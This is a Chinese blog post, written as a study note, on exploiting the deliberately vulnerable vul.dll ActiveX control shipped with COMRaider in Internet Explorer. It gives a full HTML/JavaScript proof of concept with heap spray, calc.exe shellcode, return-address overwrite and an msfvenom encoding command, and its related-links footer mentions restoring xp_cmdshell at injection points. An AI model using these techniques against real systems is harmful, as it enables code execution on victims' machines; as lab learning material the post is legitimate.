COMRaider自带vul.dll成功总结

最新推荐文章于 2022-09-03 23:50:39 发布
最新推荐文章于 2022-09-03 23:50:39 发布
阅读量710 收藏 1
点赞数
分类专栏: 二进制漏洞 文章标签: COMRaider 二进制漏洞 IE对喷射
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NEARU/article/details/103346786
版权

com组件安全研究,已然是老古董了。以下是学习研究总结,采用的是覆盖返回地址结合堆喷的技术达到任意代码执行。

ollydbg调试com组件

Iexplore.exe 在匹配到对应的com组件后会通过DispCallFunc函数转置对应的注册组件对象接口函数。
因此,可对此函数下断点。如下图所示(来自0day2):

定位漏洞触发点

一般选用以下两种方式:
1. 覆盖返回地址
2. 覆盖最近的异常处理地址

采用第1种:
可计算出,返回地址距离不受限制的字符串地址为216字节。

POC

<html>
Test Exploit page
<object classid='clsid:8EF2A07C-6E69-4144-96AA-2247D892A73D' id='target' ></object>
<script language='javascript'>

/*Calc.exe alpha_upper badchars --> "\x8b\x93\x83\x8a\x8c\x8d\x8f\x8e\x87\x81\x84\x86\x88\x89\x90\x91\x92\x94\x95\x96\x97\x98\x99\x82\x85
\x9f\x9a\x9e\x9d\x9b\x9f\x76
shell="\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8D\x04\x24\x50\xB8\x9D\x13\x76\x6C\x05\x10\x10\x10\x10\xFF\xD0\xB8\xDA\xAA\x61\x5C\x05\x20\x20\x20\x20\xFF\xD0";
*/

/* need unicode */
shell="%uc033%u6850%u652e%u6578%u6368%u6c61%u8d63%u2404%ub850%u139d%u6c76%u1005%u1010%uff10%ub8d0%uaada%u5c61%u2005%u2020%uff20%u90d0";
shell=unescape(shell);

/*
wrong because of unicode encode by iexplorer
chunk="\x90";

while (chunk.length<=0x100000)
{
chunk+=chunk;
}
chunk=chunk.substring(0,0x100000-32-4-1-shell.length));

var slide = new Array();
for (var i=0;i<=200;i++)
{
  slide[i] = chunk+shell;
}
*/

chunk=unescape("%u9090%u9090");

while (chunk.length<0x100000/2)
{
chunk+=chunk;
}
chunk=chunk.substring(0,(0x100000-32-4-1-shell.length)/2);

var slide = new Array();
for (var i=0;i<=200;i++)
{
  slide[i] = chunk+shell;
}

/*
op = unescape("%u0606%0606");  //wrong
op = "\x06\x06\x06\x06"; 常用0c0c0c0c. 一般 04040404~0b0b0b0b的之间的堆空间都可以。
*/
op = "\x06\x06\x06\x06";

nops="\x90";
while (nops.length<20){ nops+="\x90";}

junk1="A";
while (junk1.length<216){ junk1+=junk1;}
junk1=junk1.substring(0,216);

arg1=junk1+op+nops+shell;


target.Method1(arg1);
 
 
</script>
</html>

为什么选择堆喷而不是类似jmp esp的方式

  1. 堆喷相当稳定
  2. 绕过字符编码问题

字符编码

WideCharToMultiByte的影响,对于ascii值大于等于0x80的字符会被自动转化为0x3f。
例如:
jmp esp的地址:
\x49\xF0\xDE\x77.
在传递给有漏洞函数时会变为
\x49\x3F\x3F\x77
当然这可以在进程空间找到另一个不会被转换的跳板指令。

对于payload的shellcode 的坏字符可使用metasploit的工具msfvenom 进行相应编码转换

命令部分:
msfvenom -a x86 --platform windows -p windwos/exec CMD="calc.exe" -e x86/aipha_mixed BufferRegister=ESP -f -c

此人亦非
关注
专栏目录
xp——cmdshell恢复(古老语言)(内有转载)
Coisini的博客
05-25 468
1 未能找到存储过程’master…xpcmdshell’. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll’declare @o int 第二步执行:sp_adde...
和ZLTT一起学pwn 2.ret2text
qq_53610850的博客
10-27 757
2.ret2text 前置知识 基础栈溢出 攻击思路 在上一篇中,我们学习了最基础的栈溢出攻击方式。事实上,也是最基础的ret2text攻击 对elf文件结构较熟悉的人应该发现了,text就是代码段的段名,所谓ret2text,就是向程序中已有的代码段跳转,当然,通常不会有那么简单的利用条件,在调用很多函数的时候,还需要伪造参数 在这种状态下,除了需要覆盖返回地址,还需要在栈上伪造压入的参数 利用溢出在栈上伪造一个函数的传参,再劫持跳转到函数即可带参调用 攻击示例 使用如下程序作为示例程序(这个程序有更简单
com接口查看工具-COMRaider
03-07
COMRaider是开源的com接口查看工具,通过该工具可以查看已编写的ocx或com组件dll库中详细的导出接口定义。
comraider跟踪调试COM组件的接口
03-24
comraider跟踪调试COM组件的接口 我自己收集。用于学习。
comraider跟踪调试COM组件的接口2011
weixin_34101784的博客
01-04 583
参考链接:http://wenku.baidu.com/view/f175c823dd36a32d737581c9.html
COMRaider COM组件黑盒分析
05-09
COMRaider COM组件黑盒分析 COMRaider COM组件分析 黑盒分析
如何利用 show source("vul.php");
05-25
`show source("vul.php")` 是一个用于显示 PHP 文件源代码的函数。如果你想查看 vul.php 文件的源代码,可以在 PHP 文件中调用这个函数,如下所示: ```php show_source("vul.php"); ?> ``` 当你在浏览器中访问这...
解决以下代码错误: SyntaxError: Non-UTF-8 code starting with '\xe7' in file C:\Users\zhihao\PycharmProjects\pythonProject2\360_VUL.py on line 20, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details
最新发布
07-22
这个错误是由于Python解释器无法解析文件中的非UTF-8编码的字符导致的。为了解决这个问题,你可以在代码文件的开头添加一个编码声明。 你可以根据错误消息中提供的链接了解更多关于编码声明的详细信息。...
软件安全练习用执行程序
11-13
vul1.c:C语言源程序代码 Vul1.exe : 编译生成的可执行文件 题目要求: 执行 vul1.exe,在不修改程序的情况下,取得合法验证。 撰写详细的分析利用报告。 §1.2 使用的分析工具 在本次实验中,我们使用了以下工具...
COMRaider【官方下载 安装版】
01-13
这个官方安装版的可用~ 很方便的查看ActiveX对象的方法。 很小巧的实用工具。
IE安全系列之——IE中的ActiveX(II)
moonhillcity的博客
11-16 1917
0x00 使用Fuzz工具 ActiveX的Fuzzer相当之多,本次我们暂时使用一个老牌但是性能较弱的开源FuzzerCOMRaider。选择它的原因是它是一个图形化的Fuzzer,界面元素简单。但是说弱则是因为它的测试用例实在太少,而且比较陈旧(但是你可以手动添加)。比它强悍的工具还有很多,例如AxMan Fuzzer,但是AxMan的界面实在是没法截图,所以我还是用这个来演示好了
【web-渗透测试方法】(15.2)分析应用程序、测试客户端控件
09-03 340
【分析应用程序、测试客户端控件】
activeX控件学习
weixin_30791095的博客
05-22 466
ActiveX是Microsoft对于一系列策略性面向对象程序技术和工具的称呼,其中主要的技术是组件对象模型(COM)。在有目录和其它支持的网络中,COM变成了分布式COM(DCOM)。 先前 学习的 ACX控件 溢出 通过一个精心构造的 exploit第三方软件中的activeX已经成为 “网马” 惯用的 手段 一些控件封装着一些逻辑较为复杂的方法,并通过 ...
《0day安全:软件漏洞分析技术第二版》
leeeryan
01-11 6318
简单说来,这次再版的原因有二: 首先,国人深知与时俱进的道理,技术上面更是如此。随着windows平台保护技术的不断改进,win7的广泛使用,第一版中所述的很多方法已有较大局限。为此我们逐一搜集了近年来各类安全峰会上的前沿文章,读懂消化之后将其重绘于书中。可以说我们在这次再版中逐一讲述并总结了目前世界上windows 平台下几乎所有最前沿的内存exploit技术。时效性是再版的重要原因。 然后,第一版的编纂始于我求学阶段的一个简单的冲动:把手头所有的文档手稿编纂成册与大家分享。限于本人学识有限
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
LearnX控件漏洞挖掘与利用
weixin_30784501的博客
12-23 381
前言 大学英语会用到一个 ActiveX 插件 LearnX ,最近从网上下了一个下来分析了一下,找到了一些漏洞并完成了 exploit . 虽然涉及的知识比较老旧,不过还是挺有意思的。这里分享一下整个过程。 相关文件 链接: https://pan.baidu.com/s/1jfDIInXD4k1nGOeCghEGDg 提取码: dmm6 解压密码:9179ee68791ae58187eb30...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值